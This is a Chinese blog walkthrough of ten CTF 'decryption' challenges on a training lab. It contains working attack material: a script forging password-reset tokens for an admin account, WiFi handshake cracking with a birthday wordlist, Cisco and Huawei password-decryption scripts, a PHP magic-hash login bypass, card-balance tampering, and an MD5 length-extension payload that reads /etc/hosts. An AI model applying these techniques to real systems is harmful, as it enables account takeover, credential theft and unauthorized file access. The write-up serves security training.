当前位置: 首页 > news >正文

茶陵网站建设企业网站设计思路

茶陵网站建设,企业网站设计思路,西宁好的网站建设公司,网站建设与运行6.解密关 1.以管理员身份登录系统 url#xff1a;http://lab1.xseclab.com/password1_dc178aa12e73cfc184676a4100e07dac/index.php 进入网站点击忘记密码的链接#xff0c;进入到重置密码的模块 输入aaa#xff0c;点击抓包#xff0c;发送到重放模块go 查看返回的链接…6.解密关 1.以管理员身份登录系统 urlhttp://lab1.xseclab.com/password1_dc178aa12e73cfc184676a4100e07dac/index.php 进入网站点击忘记密码的链接进入到重置密码的模块 输入aaa点击抓包发送到重放模块go 查看返回的链接接下来会跳转到这个页面sukey是用来验证的盲猜是MD5加密username是要重置的用户名 服务器会对提交的sukey和username的值进行匹配 首先对sukey进行MD5解密见识多的一看就知道这是个时间戳 对时间戳进行转换发现确实是 我们可以通过伪造sukey的值来重置admin的密码 抓包查看服务器的时间发现比北京时间晚了8小时转成时间戳就是慢了28800 第一种方法在重置密码的页面输入admin放包记录服务器的时间戳 记录上面图片的时间戳 写脚本生成对应的时间戳字典 with open(pass.txt,w) as f:for x in range(1xxxx0000,1xxxx0000): #大概的时间戳范围f.write(%d\n % x)之后点击重置密码的页面用burpsuite神器爆破 字典加载上面脚本生成的字典 并且设置为MD5加密 开始爆破查找长度不同的页面得到key is yestimeispassword 第二种方法使用python脚本进行爆破 import requests import hashlib import timese requests.session() headers {Cookie: PHPSESSID423613048c7ae8017f654bea6fafe808}while 1:sukey hashlib.new(md5, str(int(time.time())-28800)).hexdigest()url http://lab1.xseclab.com/password1_dc178aa12e73cfc184676a4100e07dac/reset.php?sukey sukey usernameadminr se.get(url, headersheaders)if r.content:print r.contentbreakelse:print Cracking: sukey脚本来源https://blog.csdn.net/s0mor/article/details/102969444 2.邂逅对门的妹纸 点击Wifi-Crack 下载得到一个wifi-crack.cap包根据提示信息可以发现妹纸今年(2014年)上大三猜测wifi密码可能是生日格式出生应该在 1993 或 1994 年看这样子密码应该是 8 位数字了可以使用 EWSA 爆破。 写脚本生成一个字典dic.txt: with open(dic.txt,w) as f:for year in range(1990,2014):for month in range(1,12):for day in range(1,32):f.write(%d%02d%02d\n % (year,month,day))接下来使用 EWSA 爆破点击左上角导入数据 选中下载的wifi-crack.cap的文件然后选择“OK”这里一定要看下是不是有效包无效的握手包在图示位置就会显示无数据。 导入数据之后继续添加字典 选择一个准备好的字典点击确定 点击开始测试找到密码19940808MD5加密32位小写提交e1a45d0d24cb87490b9efb2fc2e8a2ba 3.万恶的Cisco 第一种方法使用在线cisco交换机密码破解的网站Cisco Password Cracker 得到keyaishishenmadongxiAdmin 第二种方法使用python2脚本 #!/usr/bin/env python # -*- coding: utf-8 -*- # Date: 2014/11/30 # Created by 独自等待 # 博客 http://www.waitalone.cn/ try:from cisco_decrypt import CiscoPassword except ImportError:raise SystemExit(\n模块导入错误,请使用pip进行安装!)cisco_pass 02070D48030F1C294940041801181C0C140D0A0A20253A3B crack CiscoPassword() password crack.decrypt(cisco_pass) print password4.万恶的加密 根据提示是某huawei/h3c交换机的加密密码网上查找的脚本可能是因为python2的Crypto.Cipher模块已无法安装windows下无法运行此脚本可以在kali下运行 # codingutf-8 from Crypto.Cipher import DESdef decode_char(c):if c a:r ?else:r creturn ord(r) - ord(!)def ascii_to_binary(s):assert len(s) 24out [0]*18i 0j 0for i in range(0, len(s), 4):y decode_char(s[i 0])y (y 6) 0xffffffk decode_char(s[i 1])y (y | k) 0xffffffy (y 6) 0xffffffk decode_char(s[i 2])y (y | k) 0xffffffy (y 6) 0xffffffk decode_char(s[i 3])y (y | k) 0xffffffout[j2] chr(y 0xff)out[j1] chr((y8) 0xff)out[j0] chr((y16) 0xff)j 3return .join(out)def decrypt_password(p):r ascii_to_binary(p)r r[:16]d DES.new(\x01\x02\x03\x04\x05\x06\x07\x08, DES.MODE_ECB)r d.decrypt(r)return r.rstrip(\x00)if __name__ __main__:miwen aK9Q4I)J#[Q^QMAF41!!print u明文 decrypt_password(miwen)得到key为84432079 5.喜欢泡网吧的小明 urlhttp://lab1.xseclab.com/password2_454a7a7cb7213e14695c022cfb04141c/index.php 首先点击链接下载读取后的dump文件接下来用WinHex编辑器打开该文件 看到 只有前8行有意义70以后都是无用的重复字节 题目提示说卡片数据产生了一个字节的错误大概就是修改文件头部文件头应该有始有终测试后发现是将第一个AA改为8A 从刷卡的页面来看显示的是100.00我们知道10000的十六进制是2710 根据题目要求要修改为200.00而20000的十六进制是4e20 所以我们将两个1027改成204e就可以 得到key is cardcrack_skill_get! 6.异常数据 这道题目第一眼看上去像是base64加密AGV5IULSB3ZLVSE 但是解密后却不对ey!B҇vKU! 参考一下40huo同学写的脚本非常厉害 # codingutf-8 from base64 import * import re def dfs(res, arr, pos):res.append(.join(arr))i posfor i in range(i, len(arr)):if arr[i] Z and arr[i] A:arr[i] arr[i].lower()dfs(res, arr, i 1)arr[i] arr[i].upper() arr list(AGV5IULSB3ZLVSE) res [] dfs(res, arr, 0) res_decode map(b64decode, res) for i in res_decode:if re.findall(r\\x, repr(i)):continueelse:print i脚本运行后得到hey!IloveU! 7.md5真的能碰撞嘛? urlhttp://lab1.xseclab.com/pentest5_6a204bd89f3c8348afd5c77c717a097a/ 点击网页查看源码 大概意思就是找一个和!1793422703!md5值一样的字符串且这个字符串不能是!1793422703! !1793422703!的MD5值是0e332932043729729062996282883873 本题会用到PHP处理0e开头的md5哈希字符串时的一个漏洞 PHP在处理哈希字符串时会利用”!”或””来对哈希值进行比较它把每一个以”0E”开头的哈希值都解释为0所以如果两个不同的密码经过哈希以后其哈希值都是以”0E”开头的那么PHP将会认为他们相同都是0。 所以只要POST提交password的值经过md5加密后是0e开头就行此处提供几个值passwords878926199a240610708 QNKCDZO 得到yesyouareclever! 8.小明爱上了一个搞硬件的小姑凉 下载文件用notepad打开看看发现SaleaeAsyncSerialAnalyzer 这就是提示里说的某逻辑分析仪 网上搜索下载这个软件把文件拖进去打开右下角就出现了解码后的keyiloveyou,xiaoguniang! 这里需要注意里面的COMMA是逗号自己转成 也可以自己搜索能打开后缀为logicdata格式的文件的软件结果是一样的 9.有签名限制的读取任意文件 urlhttp://lab1.xseclab.com/decrypt1_53a52adb49c55c8daa5c8ee0ff59befe/md5_le.php 根据提示本题需要MD5长度扩展攻击 本题我们使用的工具是hash_extender推荐使用Ubuntu进行安装 git clone https://github.com/iagox86/hash_extender sudo apt-get install g libssl-dev cd hash_extender make编译安装完成之后就可以继续了 ./hash_extender -f md5 -l 32 -d ‘/etc/hosts’ -s ‘f3d366138601b5afefbd4fc15731692e’ -a ‘’ --out-data-formathtml -d 原始数据 -f 代表加密方式 -l key的长度 -s 原始的hash值 -a 添加的值 –out-data-format 输出的格式 组合一下New string和New signature 最后payload如下 http://lab1.xseclab.com/decrypt1_53a52adb49c55c8daa5c8ee0ff59befe/md5_le.php?filepath%2fetc%2fhosts%80%00%00%00%00%00%00%00%00%00%00%00%00%00P%01%00%00%00%00%00%00sign1b17d9594eb404c97c5090b11660ac63 得到Flag is: Md5LenghtExtAttackNowYouSee 10.美丽的邂逅与密码器的开门密码 点击下载二进制的exe文件需要输入的字符串长度大于50 得到0h_No_u_f0und_m3 文笔生疏措辞浅薄望各位大佬不吝赐教万分感谢。 免责声明由于传播或利用此文所提供的信息、技术或方法而造成的任何直接或间接的后果及损失均由使用者本人负责 文章作者不为此承担任何责任。 转载声明儒道易行 拥有对此文章的修改和解释权如欲转载或传播此文章必须保证此文章的完整性包括版权声明等全部内容。未经作者允许不得任意修改或者增减此文章的内容不得以任何方式将其用于商业目的。 博客: https://rdyx0.github.io/先知社区 https://xz.aliyun.com/u/37846SecIN: https://www.sec-in.com/author/3097CSDN: https://blog.csdn.net/weixin_48899364?typeblog公众号 https://mp.weixin.qq.com/mp/appmsgalbum?__bizMzg5NTU2NjA1Mwactiongetalbumalbum_id1696286248027357190scene173from_msgid2247485408from_itemidx1count3nolastread1#wechat_redirectFreeBuf https://www.freebuf.com/author/%E5%9B%BD%E6%9C%8D%E6%9C%80%E5%BC%BA%E6%B8%97%E9%80%8F%E6%8E%8C%E6%8E%A7%E8%80%85
http://www.hkea.cn/news/14334064/

相关文章:

  • 深圳专业网站优化公司报价网站首页有被收录就是最近没有被抓取是怎么回事
  • 济南网站建设联系小七怎么把网站建设推广出去
  • 网络营销网站设计网站后台怎么做
  • 做视频网站推广挣钱吗seo优化软件下载
  • vps做网站教程重庆森林壁纸
  • p2p网贷网站建设软件开发流程图教程
  • 沈阳网站建设找德泰诺dw制作网页的过程
  • 做图片网站编辑标题怎么写能吸引免费外贸网站建设
  • 网站没有收录了在线建筑设计
  • 招聘信息网站宿迁西楚房产网
  • perl做网站网易企业邮箱怎么申请
  • 怎么自己做卡盟网站wordpress怎么新建栏目
  • 做外贸网站的价格山西省消防总队建设工程备案网站
  • 重庆网站建设推广服务国外图片设计网站有哪些
  • 一站式网站建设方案虚拟主机部署网站
  • 中国建设银行信用卡旅游卡服务网站线上编程课程
  • 四川网站制作成都免费crm管理系统软件
  • 佛山营销网站开发怎么选服务器做多个网站
  • 简述网站开发建设的基本流程电脑怎么制作图片
  • 网站设计示例浙江信息港网证书查询
  • 上海自主建站模板凡科建站怎么保存网站
  • 手机网站后台模板食品包装设计说明
  • 网站备案核验照片背景做视频课程网站
  • 图书馆网站建设需求方案网站建设项目需求分析流程
  • 网站属于什么公司医疗网站建设好么
  • 用什么软件建网站最方便用代码怎么建设网站
  • 专业的网站建设价格低建设项目 环评申报网站
  • 怎么创建网站充值和提现账号云南省建设工程信息网官网
  • 网站建设总体规划包括哪些方面网站服务器基本要素
  • wordpress域名变了迁移网站优化seo推广服务